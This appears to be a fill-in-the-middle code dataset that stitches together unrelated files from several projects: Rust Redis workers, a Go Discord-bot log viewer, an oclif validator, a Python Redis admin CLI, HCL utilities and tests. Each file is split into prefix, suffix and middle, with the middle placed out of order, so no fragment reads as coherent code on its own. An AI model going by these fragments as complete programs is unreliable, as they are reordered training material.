let event = rx.recv().unwrap_or(AppEvent::Terminate);
match event {
AppEvent::Request(request) => {
let p = &mut pool.get();
let client = match p {
Ok(c) => c.deref_mut(),
Err(e) => {
error!("{}", e);
continue; // or break?
}
};
let result = match request {
RedisRequest::Info => {
match info(client) {
Ok(result) => { result }
Err(e) => {
error!("{}", e);
continue; // or break?
}
}
}
RedisRequest::SlowLog => {
match slow_log(client) {
Ok(result) => { result }
Err(e) => {
error!("{}", e);
continue; // or break?
}
}
}
};
if let Err(e) = tx.send(result) {
error!("{}", e);
}
}
AppEvent::Terminate => {
break;
}
_ => {}
};
}
})?;
workers.push(worker);
}
Ok(workers)
}
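// Illustrative wiring sketch (assumes the redis crate's r2d2 integration is
// enabled; everything outside this file is hypothetical):
//
//     let (tx, rx) = flume::unbounded::<AppEvent>();
//     let pool = Pool::builder()
//         .build(Client::open("redis://127.0.0.1/").unwrap())
//         .unwrap();
//     setup_terminal_worker(tx.clone()).unwrap();
//     setup_tick_worker(tx.clone(), Duration::from_millis(500)).unwrap();
//     setup_redis_workers(tx, rx, 4, pool).unwrap();
//
// All workers publish onto the same AppEvent channel; the redis workers also
// consume AppEvent::Request messages from it and reply with AppEvent::Result.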
fn info(client: &mut Connection) -> Result<AppEvent, RedisError> {
let start = time::Instant::now();
let info = redis::cmd("info").arg("all").query::<String>(client)?;
let latency = start.elapsed().as_millis();
Ok(AppEvent::Result(RedisResult::Info(Metric::from(info).latency(latency))))
}
fn slow_log(client: &mut Connection) -> Result<AppEvent, RedisError> | {
let v = redis::cmd("slowlog").arg("get").arg("50").query::<Vec<Vec<(u64, i64, i64, Vec<String>, String, String)>>>(client)?;
Ok(AppEvent::Result(RedisResult::SlowLog(SlowLog::from(v))))
} |
|
client-state-log.model.ts | public id: number,
public date: string,
public time: string,
public filename: string
) { }
}
export class ClientStateLogs {
constructor(
public logItems: ClientStateLog[]
) { }
} | export class ClientStateLog {
constructor(
|
|
web.go | package logs
import (
"context"
"errors"
"fmt"
"html/template"
"net/http"
"strconv"
"strings"
"github.com/jonas747/discordgo"
"github.com/jonas747/yagpdb/bot"
"github.com/jonas747/yagpdb/bot/botrest"
"github.com/jonas747/yagpdb/common"
"github.com/jonas747/yagpdb/logs/models"
"github.com/jonas747/yagpdb/web"
"github.com/volatiletech/null"
"github.com/volatiletech/sqlboiler/boil"
"goji.io"
"goji.io/pat"
)
var AuthorColors = []string{
"7c7cff", // blue-ish
"529fb7", // lighter blue
"4aa085", // dark-green
"7ea04a", // lighter green
"a0824a", // brown
"a04a4a", // red
"a04a89", // purple?
}
type DeleteData struct {
ID int64
}
type ConfigFormData struct {
UsernameLoggingEnabled bool
NicknameLoggingEnabled bool
ManageMessagesCanViewDeleted bool
EveryoneCanViewDeleted bool
BlacklistedChannels []string
MessageLogsAllowedRoles []int64
}
func (lp *Plugin) InitWeb() {
web.LoadHTMLTemplate("../../logs/assets/logs_control_panel.html", "templates/plugins/logs_control_panel.html")
web.LoadHTMLTemplate("../../logs/assets/logs_view.html", "templates/plugins/logs_view.html")
web.AddSidebarItem(web.SidebarCategoryTools, &web.SidebarItem{
Name: "Logging",
URL: "logging/",
Icon: "fas fa-database",
})
web.ServerPublicMux.Handle(pat.Get("/logs/:id"), web.RenderHandler(LogFetchMW(HandleLogsHTML, true), "public_server_logs"))
web.ServerPublicMux.Handle(pat.Get("/logs/:id/"), web.RenderHandler(LogFetchMW(HandleLogsHTML, true), "public_server_logs"))
web.ServerPublicMux.Handle(pat.Get("/log/:id"), web.RenderHandler(LogFetchMW(HandleLogsHTML, false), "public_server_logs"))
web.ServerPublicMux.Handle(pat.Get("/log/:id/"), web.RenderHandler(LogFetchMW(HandleLogsHTML, false), "public_server_logs"))
logCPMux := goji.SubMux()
web.CPMux.Handle(pat.New("/logging"), logCPMux)
web.CPMux.Handle(pat.New("/logging/*"), logCPMux)
cpGetHandler := web.ControllerHandler(HandleLogsCP, "cp_logging")
logCPMux.Handle(pat.Get("/"), cpGetHandler)
logCPMux.Handle(pat.Get(""), cpGetHandler)
saveHandler := web.ControllerPostHandler(HandleLogsCPSaveGeneral, cpGetHandler, ConfigFormData{}, "Updated logging config")
fullDeleteHandler := web.ControllerPostHandler(HandleLogsCPDelete, cpGetHandler, DeleteData{}, "Deleted a channel log")
msgDeleteHandler := web.APIHandler(HandleDeleteMessageJson)
logCPMux.Handle(pat.Post("/"), saveHandler)
logCPMux.Handle(pat.Post(""), saveHandler)
logCPMux.Handle(pat.Post("/fulldelete2"), fullDeleteHandler)
logCPMux.Handle(pat.Post("/msgdelete2"), msgDeleteHandler)
}
func HandleLogsCP(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
ctx := r.Context()
g, tmpl := web.GetBaseCPContextData(ctx)
beforeID := 0
beforeStr := r.URL.Query().Get("before")
if beforeStr != "" {
beforeId64, err := strconv.ParseInt(beforeStr, 10, 32)
if err != nil {
tmpl.AddAlerts(web.ErrorAlert("Failed parsing before id"))
}
beforeID = int(beforeId64)
} else {
tmpl["FirstPage"] = true
}
afterID := 0
afterStr := r.URL.Query().Get("after")
if afterStr != "" {
id64, err := strconv.ParseInt(afterStr, 10, 32)
if err != nil {
tmpl.AddAlerts(web.ErrorAlert("Failed parsing before id"))
}
afterID = int(id64)
tmpl["FirstPage"] = false
}
serverLogs, err := GetGuilLogs(ctx, g.ID, beforeID, afterID, 20)
web.CheckErr(tmpl, err, "Failed retrieving logs", web.CtxLogger(ctx).Error)
if err == nil {
tmpl["Logs"] = serverLogs
if len(serverLogs) > 0 {
tmpl["Oldest"] = serverLogs[len(serverLogs)-1].ID
tmpl["Newest"] = serverLogs[0].ID
}
}
general, err := GetConfig(common.PQ, ctx, g.ID)
if err != nil {
return nil, err
}
tmpl["Config"] = general
// dealing with legacy code is a pain, gah
// so way back i didn't know about arrays in postgres, so i made the blacklisted channels field a single TEXT field, with a comma separator
blacklistedChannels := make([]int64, 0, 10)
split := strings.Split(general.BlacklistedChannels.String, ",")
for _, v := range split {
i, err := strconv.ParseInt(v, 10, 64)
if i != 0 && err == nil {
blacklistedChannels = append(blacklistedChannels, i)
}
}
tmpl["ConfBlacklistedChannels"] = blacklistedChannels
return tmpl, nil
}
func HandleLogsCPSaveGeneral(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
ctx := r.Context()
g, tmpl := web.GetBaseCPContextData(ctx)
form := ctx.Value(common.ContextKeyParsedForm).(*ConfigFormData)
config := &models.GuildLoggingConfig{
GuildID: g.ID,
NicknameLoggingEnabled: null.BoolFrom(form.NicknameLoggingEnabled),
UsernameLoggingEnabled: null.BoolFrom(form.UsernameLoggingEnabled),
BlacklistedChannels: null.StringFrom(strings.Join(form.BlacklistedChannels, ",")),
EveryoneCanViewDeleted: null.BoolFrom(form.EveryoneCanViewDeleted),
ManageMessagesCanViewDeleted: null.BoolFrom(form.ManageMessagesCanViewDeleted),
MessageLogsAllowedRoles: form.MessageLogsAllowedRoles,
}
err := config.UpsertG(ctx, true, []string{"guild_id"}, boil.Infer(), boil.Infer())
if err == nil {
logger.Println("evicting")
bot.EvictGSCache(g.ID, CacheKeyConfig)
}
return tmpl, err
}
func HandleLogsCPDelete(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
ctx := r.Context()
g, tmpl := web.GetBaseCPContextData(ctx)
data := ctx.Value(common.ContextKeyParsedForm).(*DeleteData)
if data.ID == 0 {
return tmpl, errors.New("ID is blank!")
}
_, err := models.MessageLogs2s(
models.MessageLogs2Where.ID.EQ(int(data.ID)),
models.MessageLogs2Where.GuildID.EQ(g.ID),
).DeleteAll(r.Context(), common.PQ)
if err != nil {
return tmpl, err
}
// for legacy setups
// _, err = models.Messages(models.MessageWhere.MessageLogID.EQ(null.IntFrom(int(data.ID)))).DeleteAll(ctx, common.PQ)
return tmpl, err
}
func CheckCanAccessLogs(w http.ResponseWriter, r *http.Request, config *models.GuildLoggingConfig) bool {
_, tmpl := web.GetBaseCPContextData(r.Context())
isAdmin, _ := web.IsAdminRequest(r.Context(), r)
// check if we're allowed access to logs on this server
if isAdmin || len(config.MessageLogsAllowedRoles) < 1 {
return true
}
member := web.ContextMember(r.Context())
if member == nil {
tmpl.AddAlerts(web.ErrorAlert("This server has restricted log access to certain roles, either you're not logged in or not on this server."))
return false
}
if !common.ContainsInt64SliceOneOf(member.Roles, config.MessageLogsAllowedRoles) {
tmpl.AddAlerts(web.ErrorAlert("This server has restricted log access to certain roles, you don't have any of them."))
return false
}
return true
}
type ctxKey int
const (
ctxKeyLogs ctxKey = iota
ctxKeyMessages
ctxKeyConfig
)
func | (inner web.CustomHandlerFunc, legacy bool) web.CustomHandlerFunc {
return func(w http.ResponseWriter, r *http.Request) interface{} {
g, tmpl := web.GetBaseCPContextData(r.Context())
idString := pat.Param(r, "id")
parsed, err := strconv.ParseInt(idString, 10, 64)
if web.CheckErr(tmpl, err, "Thats's not a real log id", nil) {
return tmpl
}
config, err := GetConfig(common.PQ, r.Context(), g.ID)
if web.CheckErr(tmpl, err, "Error retrieving config for this server", web.CtxLogger(r.Context()).Error) {
return tmpl
}
if !CheckCanAccessLogs(w, r, config) {
return tmpl
}
sm := SearchModeLegacy
if !legacy {
sm = SearchModeNew
}
// retrieve logs
msgLogs, messages, err := GetChannelLogs(r.Context(), parsed, g.ID, sm)
if web.CheckErr(tmpl, err, "Failed retrieving message logs", web.CtxLogger(r.Context()).Error) {
return tmpl
}
if msgLogs.GuildID != g.ID {
return tmpl.AddAlerts(web.ErrorAlert("Couldn't find the logs im so sorry please dont hurt me i have a family D:"))
}
ctx := r.Context()
ctx = context.WithValue(ctx, ctxKeyLogs, msgLogs)
ctx = context.WithValue(ctx, ctxKeyMessages, messages)
ctx = context.WithValue(ctx, ctxKeyConfig, config)
return inner(w, r.WithContext(ctx))
}
}
type MessageView struct {
Model *models.Messages2
Color string
Timestamp string
}
func HandleLogsHTML(w http.ResponseWriter, r *http.Request) interface{} {
g, tmpl := web.GetBaseCPContextData(r.Context())
logs := r.Context().Value(ctxKeyLogs).(*models.MessageLogs2)
messages := r.Context().Value(ctxKeyMessages).([]*models.Messages2)
config := r.Context().Value(ctxKeyConfig).(*models.GuildLoggingConfig)
// check if we're allowed to view deleted messages
canViewDeleted, _ := web.IsAdminRequest(r.Context(), r)
if config.EveryoneCanViewDeleted.Bool {
canViewDeleted = true
} else if config.ManageMessagesCanViewDeleted.Bool && !canViewDeleted {
canViewDeleted = web.HasPermissionCTX(r.Context(), discordgo.PermissionManageMessages)
}
tmpl["CanViewDeleted"] = canViewDeleted
// Convert into views with formatted dates and colors
const TimeFormat = "2006 Jan 02 15:04"
messageViews := make([]*MessageView, len(messages))
for i := range messageViews {
m := messages[i]
v := &MessageView{
Model: m,
Timestamp: m.CreatedAt.Format(TimeFormat),
}
messageViews[i] = v
}
SetMessageLogsColors(g.ID, messageViews)
tmpl["Logs"] = logs
tmpl["Messages"] = messageViews
return tmpl
}
func SetMessageLogsColors(guildID int64, views []*MessageView) {
users := make([]int64, 0, 50)
for _, v := range views {
if !common.ContainsInt64Slice(users, v.Model.AuthorID) {
users = append(users, v.Model.AuthorID)
}
}
roleColors, _ := botrest.GetMemberColors(guildID, users...)
if roleColors == nil {
return
}
for _, v := range views {
strAuthorID := strconv.FormatInt(v.Model.AuthorID, 10)
color := roleColors[strAuthorID]
if color != 0 {
v.Color = strconv.FormatInt(int64(color), 16)
}
}
}
func HandleDeleteMessageJson(w http.ResponseWriter, r *http.Request) interface{} {
g, _ := web.GetBaseCPContextData(r.Context())
logsId := r.FormValue("LogID")
msgID := r.FormValue("MessageID")
if logsId == "" || msgID == "" {
return web.NewPublicError("Empty id")
}
parsedLogsID, _ := strconv.ParseInt(logsId, 10, 64)
_, err := models.MessageLogs2s(
models.MessageLogs2Where.ID.EQ(int(parsedLogsID)),
models.MessageLogs2Where.GuildID.EQ(g.ID),
).OneG(r.Context())
if err != nil {
return err
}
parsedMsgID, _ := strconv.ParseInt(msgID, 10, 64)
_, err = models.Messages2s(
models.Messages2Where.ID.EQ(parsedMsgID),
models.Messages2Where.GuildID.EQ(g.ID)).UpdateAllG(
r.Context(), models.M{"deleted": true})
if err != nil {
return err
}
user := r.Context().Value(common.ContextKeyUser).(*discordgo.User)
common.AddCPLogEntry(user, g.ID, "Deleted a message from log #"+logsId)
return err
}
var _ web.PluginWithServerHomeWidget = (*Plugin)(nil)
func (p *Plugin) LoadServerHomeWidget(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
activeGuild, templateData := web.GetBaseCPContextData(r.Context())
templateData["WidgetTitle"] = "Logging"
templateData["SettingsPath"] = "/logging/"
config, err := GetConfig(common.PQ, r.Context(), activeGuild.ID)
if err != nil {
return templateData, err
}
nBlacklistedChannels := 0
if len(config.BlacklistedChannels.String) > 0 {
split := strings.Split(config.BlacklistedChannels.String, ",")
nBlacklistedChannels = len(split)
}
format := `<ul>
<li>Username logging: %s</li>
<li>Nickname logging: %s</li>
<li>Blacklisted channels from creating message logs: <code>%d</code></li>
</ul>`
templateData["WidgetEnabled"] = true
templateData["WidgetBody"] = template.HTML(fmt.Sprintf(format, web.EnabledDisabledSpanStatus(config.UsernameLoggingEnabled.Bool),
web.EnabledDisabledSpanStatus(config.NicknameLoggingEnabled.Bool), nBlacklistedChannels))
return templateData, nil
}
| LogFetchMW |
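LogFetchMW above is a context-enriching middleware: validate the id, load the config, run access checks, stash the fetched logs in the request context, then call the inner handler. A minimal framework-free Python sketch of the same shape; the request dict and the get_config/get_channel_logs callables are stand-ins, not real APIs:
def log_fetch_middleware(inner, get_config, get_channel_logs):
    def handler(request):
        # Validate the id parameter before doing any work.
        try:
            log_id = int(request["params"]["id"])
        except (KeyError, ValueError):
            return {"error": "that's not a real log id"}
        config = get_config(request["guild_id"])
        if not can_access_logs(request, config):
            return {"error": "access denied"}
        # Fetch once, attach to the context, and delegate to the inner handler.
        logs, messages = get_channel_logs(log_id, request["guild_id"])
        request["context"] = {"logs": logs, "messages": messages, "config": config}
        return inner(request)
    return handler

def can_access_logs(request, config) -> bool:
    # Mirrors CheckCanAccessLogs: admins always pass; otherwise the member
    # must hold at least one of the allowed roles (empty list means open).
    allowed = set(config.get("allowed_roles", []))
    return bool(request.get("is_admin")) or not allowed or bool(allowed & set(request.get("roles", [])))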
validate.ts | import {CLIError} from '@oclif/errors'
import {Arg} from './args'
import {
InvalidArgsSpecError,
RequiredArgsError,
RequiredFlagError,
UnexpectedArgsError,
} from './errors'
import {ParserInput, ParserOutput} from './parse'
import {IFlag} from './flags'
export function validate(parse: {
input: ParserInput;
output: ParserOutput<any, any>;
}) {
function | () {
const maxArgs = parse.input.args.length
if (parse.input.strict && parse.output.argv.length > maxArgs) {
const extras = parse.output.argv.slice(maxArgs)
throw new UnexpectedArgsError({parse, args: extras})
}
const missingRequiredArgs: Arg<any>[] = []
let hasOptional = false
parse.input.args.forEach((arg, index) => {
if (!arg.required) {
hasOptional = true
} else if (hasOptional) {
// (required arg) check whether an optional has occurred before
// optionals should follow required, not before
throw new InvalidArgsSpecError({parse, args: parse.input.args})
}
if (arg.required) {
if (!parse.output.argv[index] && parse.output.argv[index] as any as number !== 0) {
missingRequiredArgs.push(arg)
}
}
})
if (missingRequiredArgs.length > 0) {
throw new RequiredArgsError({parse, args: missingRequiredArgs})
}
}
function validateAcrossFlags(flag: IFlag<any>) {
const intersection = Object.entries(parse.input.flags)
.map(entry => entry[0]) // array of flag names
.filter(flagName => parse.output.flags[flagName] !== undefined) // with values
.filter(flagName => flag.exactlyOne && flag.exactlyOne.includes(flagName)) // and in the exactlyOne list
if (intersection.length === 0) {
// the command's exactlyOne may or may not include itself, so we'll use Set to add + de-dupe
throw new CLIError(`Exactly one of the following must be provided: ${[
...new Set([...(flag.exactlyOne || []), flag.name]),
].join(',')}`)
}
}
function validateFlags() {
for (const [name, flag] of Object.entries(parse.input.flags)) {
if (parse.output.flags[name] !== undefined) {
for (const also of flag.dependsOn || []) {
if (!parse.output.flags[also]) {
throw new CLIError(
`--${also}= must also be provided when using --${name}=`,
)
}
}
for (const also of flag.exclusive || []) {
// do not enforce exclusivity for flags that were defaulted
if (
parse.output.metadata.flags[also] &&
parse.output.metadata.flags[also].setFromDefault
)
continue
if (
parse.output.metadata.flags[name] &&
parse.output.metadata.flags[name].setFromDefault
)
continue
if (parse.output.flags[also]) {
throw new CLIError(
`--${also}= cannot also be provided when using --${name}=`,
)
}
}
for (const also of flag.exactlyOne || []) {
if (also !== name && parse.output.flags[also]) {
throw new CLIError(
`--${also}= cannot also be provided when using --${name}=`,
)
}
}
} else if (flag.required) {
throw new RequiredFlagError({parse, flag})
} else if (flag.exactlyOne && flag.exactlyOne.length > 0) {
validateAcrossFlags(flag)
}
}
}
validateArgs()
validateFlags()
}
| validateArgs |
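validateFlags enforces three relationships between flags: dependsOn (must appear together), exclusive (must not co-occur), and exactlyOne (exactly one member of a group). A condensed Python sketch of the same rules, assuming plain-dict flag specs; all names here are illustrative:
def validate_flags(specs: dict, values: dict) -> None:
    checked = set()
    for name, spec in specs.items():
        if name in values:
            for other in spec.get("dependsOn", []):
                if other not in values:
                    raise ValueError(f"--{other} must also be provided when using --{name}")
            for other in spec.get("exclusive", []):
                if other in values:
                    raise ValueError(f"--{other} cannot also be provided when using --{name}")
        elif spec.get("required"):
            raise ValueError(f"the required flag --{name} is missing")
        group = spec.get("exactlyOne")
        if group:
            members = frozenset(group) | {name}
            if members not in checked:
                checked.add(members)
                if sum(1 for f in members if f in values) != 1:
                    raise ValueError(f"exactly one of {sorted(members)} must be provided")

validate_flags({"json": {}, "csv": {"exclusive": ["json"]}}, {"csv": True})  # passes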
services.py | #!/usr/bin/env python3
import redis
import argparse
import hashlib
from getpass import getpass
r = redis.StrictRedis(host="localhost", port=6379)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--add', action='store_true', help='Adds a service')
group.add_argument('--check', action='store_true', help='Retrieve and print service details')
group.add_argument('--delete', action='store_true', help='Delete a service entry')
group.add_argument('--update', action='store_true', help='Update a service entry')
group.add_argument('--list', action='store_true', help='List all services')
group.add_argument('--stats', action='store_true', help='Statistics for all services')
parser.add_argument('service', nargs='?', default=None, type=str, help='Service username')
args = parser.parse_args()
if not args.service and not (args.list or args.stats):
from sys import exit
parser.print_help()
exit(1)
def hash_key(x: str):
m = hashlib.blake2b()
m.update(x.encode("utf-8"))
return m.digest()
def exists(key: str):
existing = r.exists(f"service:{key}") and r.sismember('services', key)
if not existing:
print(f"{key} not found")
else:
print(f"{key} exists")
return existing
def existing_users():
return [l.decode("utf-8") for l in r.smembers('services')]
def interactive_add():
public = "N/A"
public_opts = ["Y", "N"]
while public not in public_opts:
public = input("Public information? (Y/N): ")
display = input("Display name: ")
website = input("Website: ")
api_key = None
while not api_key:
api_key = getpass("API Key (hidden, will be hashed): ")
options = {
"public": public,
"display": display,
"website": website,
"api_key": hash_key(api_key),
"precache": 0,
"ondemand": 0
}
return options
def interactive_update():
public = "N/A"
public_opts = ["Y", "N", ""]
while public not in public_opts:
public = input("Public information? (Y/N): ")
display = input("Display name: ")
website = input("Website: ")
api_key = getpass("API Key (hidden, will be hashed): ")
options = dict()
if public:
options["public"] = public
if display:
options["display"] = display
if website:
options["website"] = website
if api_key:
options["api_key"] = hash_key(api_key)
return options
def display(user):
options = r.hgetall(f"service:{user}")
options = {k.decode("utf-8"): v for k,v in options.items()}
options = {k: v if k=="api_key" else v.decode("utf-8") for k,v in options.items()}
print(options)
def add(user):
print("Creating new entry.")
options = interactive_add()
r.hmset(f"service:{user}", options)
r.sadd("services", user)
print(f"User {user} created:")
display(user)
def update(user):
print("Updating entry. Leave a field blank to skip.")
options = interactive_update()
if options:
r.hmset(f"service:{user}", options)
print(f"User {user} updated:")
else:
print(f"No changes to {user}:")
display(user)
def delete(user):
print("Deleting entry.")
r.delete(f"service:{user}")
r.srem('services', user)
user_exists = exists(user)
if user_exists:
print("Failure in deleting")
else:
print("Deleting successfull")
def statistics(users):
for user in users:
stats = r.hgetall(f"service:{user}")
stats = {k.decode("utf-8"): v for k,v in stats.items()}
stats = {k: v if k=="api_key" else v.decode("utf-8") for k,v in stats.items()}
print(user)
print(f"\t{'PUBLIC' if stats['public']=='Y' else 'PRIVATE'}\n"
f"\tprecache: {stats.get('precache') or 0}"
f"\tondemand: {stats.get('ondemand') or 0}" | def main():
if args.list:
print("Services in database:\n", existing_users())
elif args.stats:
statistics(existing_users())
else:
user = args.service
user_exists = exists(user)
if not user_exists:
if args.add:
add(user)
else:
print("Services in database:\n", existing_users())
else:
if args.check:
display(user)
elif args.delete:
delete(user)
elif args.update:
update(user)
else:
raise NotImplementedError
if __name__ == '__main__':
main() | )
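services.py stores only a blake2b digest of each API key, so verifying a caller means re-hashing the presented key and comparing digests. A minimal sketch, assuming the same service:{name} hash schema; check_api_key is a hypothetical helper, not part of the script:
import hashlib
import hmac
import redis

def hash_key(x: str) -> bytes:
    # Same digest construction as the script above.
    m = hashlib.blake2b()
    m.update(x.encode("utf-8"))
    return m.digest()

def check_api_key(r: redis.StrictRedis, service: str, presented: str) -> bool:
    stored = r.hget(f"service:{service}", "api_key")
    # hmac.compare_digest avoids timing leaks when comparing secrets.
    return stored is not None and hmac.compare_digest(stored, hash_key(presented))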
|
rest_API_client.py | # you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Giuliana Carullo'
__copyright__ = "Copyright (c) 2017, Intel Research and Development Ireland Ltd."
__license__ = "Apache 2.0"
__maintainer__ = "Giuliana Carullo"
__email__ = "[email protected]"
__status__ = "Development"
import requests
import json
json_recipe = {
"name": 'avg_test',
"description": 'test workload',
"resourceURI": '/avg-test',
"exec": 'avg_test',
"exec_type": 'docker',
"category": {
"cpu": 'low',
"memory": 'low',
"disk": 'low',
"network": 'low',
"inclinometer": False,
"temperature": False,
"jammer": False,
"location": False,
"battery level": False,
"door sensor": False,
"pump sensor": False,
"accelerometer": False,
"humidity": False,
"air_pressure": False,
"ir_motion": False
}
}
# "ts_to":'1522144965',
# "ts_from":'1522144953',
json_internal = {
"id": 'avg_test',
"ts_to": '1522144965',
"ts_from": '1522144953',
"analysis_id": '',
}
headers = {'Content-type': 'application/json', 'Accept': 'text/json'}
# data=json.dumps(payload)
url = 'http://localhost:46020/mf2c/optimal'
res = requests.post(url, json=json_recipe, headers=headers)
if res.ok:
print('Optimal Done')
json_data = json.loads(res.text)
print(json_data)
headers = {'Content-type': 'application/json', 'Accept': 'text/json'}
url = 'http://localhost:46020/mf2c/analyse'
res = requests.post(url, json=json_internal, headers=headers)
if res.ok:
print('Analysis Done')
print ('Received: {}'.format(res.text))
json_data = json.loads(res.text)
json_internal = json_data
print(json_data)
url = 'http://localhost:46020/mf2c/refine'
res = requests.post(url, json=json_internal, headers=headers)
if res.ok:
print('Refine recipe Done')
print ('Received: {}'.format(res.text))
json_data = json.loads(res.text)
print(json_data) | # Copyright (c) 2017, Intel Research and Development Ireland Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); |
|
main.rs | extern crate xshade;
extern crate getopts;
use getopts::Options;
use std::env;
use xshade::*;
mod file_resolver;
fn get_span_line(lines: &Vec<&str>, span: Span) -> String {
lines[span.line - 1].to_owned()
}
fn create_span_marker(span: Span) -> String {
let mut marker = String::new();
for _ in 0..span.column - 1 {
marker.push_str(" ");
}
for _ in 0..span.length {
marker.push_str("^");
}
marker
}
fn create_path_with_span(path: &str, span: Span) -> String {
let mut p = String::new();
p.push_str(path);
p.push_str(":");
p.push_str(&span.line.to_string());
p.push_str(":");
p.push_str(&span.column.to_string());
p
}
fn prefix(line: &str, indent: usize, content: &str) -> String {
let mut l = String::new();
l.push_str(" ");
for _ in 0..indent - content.len() {
l.push_str(" ");
}
l.push_str(content);
l.push_str(" | ");
l.push_str(line);
l
}
fn single_span_error(line: &str, span: Span, path: &str, top: String, bottom: String) {
let marker = create_span_marker(span);
let indent = span.line.to_string().len();
println!("{}", top);
println!("error:");
println!("{}", path);
println!("{}", prefix(&line, indent, &span.line.to_string()));
println!("{}", prefix(&marker, indent, ""));
println!("{}", bottom);
}
pub fn main() {
let args: Vec<String> = env::args().collect();
let program = args[0].clone();
let module_path = args[1].to_string();
let file_resolver = file_resolver::FileResolver::new();
let mut compiler = Compiler::new(Box::new(file_resolver));
match compiler.compile_module(&module_path) {
Ok(module) => | ,
Err(error) => {
println!("{:#?}", error);
}
}
} | {
if let Some(error) = module.get_error() {
let source = module.get_source();
let lines: Vec<&str> = source.lines().collect();
match error.get_kind() {
&CompileErrorKind::TypeError(ref type_error) => {
let path = create_path_with_span(module.get_path(), type_error.get_span());
match type_error.get_kind() {
&TypeErrorKind::TypeNotFound(ref type_name) => {
let span = type_error.get_span();
let line = get_span_line(&lines, span);
single_span_error(&line, span, &path,
format!("error: Type not found:"),
format!("Type `{}` not found in current or any parent scope.", type_name));
}
&TypeErrorKind::TypeHasNoMember => {
let span = type_error.get_span();
let line = get_span_line(&lines, span);
single_span_error(&line, span, &path,
format!("error: Type has no members:"),
format!("Type `{{}}` has no members."));
}
&TypeErrorKind::IncompatibleTypes(left, right) => {
let left_line = get_span_line(&lines, left);
let right_line = get_span_line(&lines, right);
let left_marker = create_span_marker(left);
let right_marker = create_span_marker(right);
let indent = right.line.to_string().len();
println!("");
println!("error: Incompatible Types:");
println!("{}", path);
println!("{}", prefix(&left_line, indent, &left.line.to_string()));
println!("{}", prefix(&left_marker, indent, ""));
println!("{}", prefix(&right_line, indent, &right.line.to_string()));
println!("{}", prefix(&right_marker, indent, ""));
println!("Cannot use operator `{{}}` on type `{{}}` and `{{}}`.");
}
_ => println!("{:#?}", error),
}
},
_ => println!("{:#?}", error),
}
} else {
println!("{:#?}", module);
}
} |
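main.rs renders caret-style diagnostics by hand: a numbered gutter, the offending source line, and a ^ marker padded out to the span's column (create_span_marker plus prefix). A compact Python sketch of the same rendering; render_diagnostic and its span fields are hypothetical names mirroring the Rust Span:
def render_diagnostic(source: str, line: int, column: int, length: int) -> str:
    # line and column are 1-indexed, as in the Rust Span struct.
    text = source.splitlines()[line - 1]
    marker = " " * (column - 1) + "^" * length
    gutter = str(line)
    pad = " " * len(gutter)
    return (f" {gutter} | {text}\n"
            f" {pad} | {marker}")

print(render_diagnostic("let x: Foo = 1;", 1, 8, 3))
#  1 | let x: Foo = 1;
#    |        ^^^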
utilities.go | // Copyright 2016-2020, Pulumi Corporation.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package model
import (
"sort"
"github.com/hashicorp/hcl/v2"
"github.com/hashicorp/hcl/v2/hclsyntax"
"github.com/pulumi/pulumi/pkg/v2/codegen/hcl2/syntax"
)
func syntaxOrNone(node hclsyntax.Node) hclsyntax.Node |
// SourceOrderLess returns true if the first range precedes the second when ordered by source position. Positions are
// ordered first by filename, then by byte offset.
func SourceOrderLess(a, b hcl.Range) bool {
return a.Filename < b.Filename || (a.Filename == b.Filename && a.Start.Byte < b.Start.Byte)
}
// SourceOrderBody sorts the contents of an HCL2 body in source order.
func SourceOrderBody(body *hclsyntax.Body) []hclsyntax.Node {
items := make([]hclsyntax.Node, 0, len(body.Attributes)+len(body.Blocks))
for _, attr := range body.Attributes {
items = append(items, attr)
}
for _, block := range body.Blocks {
items = append(items, block)
}
sort.Slice(items, func(i, j int) bool {
return SourceOrderLess(items[i].Range(), items[j].Range())
})
return items
}
| {
if node == nil {
return syntax.None
}
return node
} |
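SourceOrderLess is lexicographic comparison of (filename, start byte) pairs, and in Python tuple ordering expresses the same rule directly. A small illustrative sketch with made-up ranges:
# Ranges as (filename, start_byte) tuples; tuple comparison orders by
# filename first, then by byte offset within the same file.
ranges = [("b.hcl", 10), ("a.hcl", 99), ("a.hcl", 5)]
print(sorted(ranges))  # [('a.hcl', 5), ('a.hcl', 99), ('b.hcl', 10)]

def source_order_less(a: tuple, b: tuple) -> bool:
    # Equivalent to: a.Filename < b.Filename ||
    #   (a.Filename == b.Filename && a.Start.Byte < b.Start.Byte)
    return a < b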
form_extend_test.go | package widget
import (
"testing"
"fyne.io/fyne/test"
"github.com/stretchr/testify/assert"
)
type extendedForm struct {
Form
}
func | (t *testing.T) {
form := &extendedForm{}
form.ExtendBaseWidget(form)
form.Items = []*FormItem{{Text: "test1", Widget: NewEntry()}}
assert.NotNil(t, test.WidgetRenderer(form))
assert.Equal(t, 2, len(form.itemGrid.Objects))
form.Append("test2", NewEntry())
assert.Equal(t, 4, len(form.itemGrid.Objects))
}
func TestForm_Extended_Append(t *testing.T) {
form := &extendedForm{}
form.ExtendBaseWidget(form)
form.Items = []*FormItem{{Text: "test1", Widget: NewEntry()}}
assert.Equal(t, 1, len(form.Items))
form.Append("test2", NewEntry())
assert.Equal(t, 2, len(form.Items))
item := &FormItem{Text: "test3", Widget: NewEntry()}
form.AppendItem(item)
assert.Equal(t, 3, len(form.Items))
assert.Equal(t, item, form.Items[2])
}
| TestForm_Extended_CreateRenderer |
rest.js | const res = await axios.get(`http://localhost:1337/${url}`);
return res.data;
} | import axios from "axios";
export default async function rest(url) { |
|
direct_fidelity_estimation.py | """Implements direct fidelity estimation.
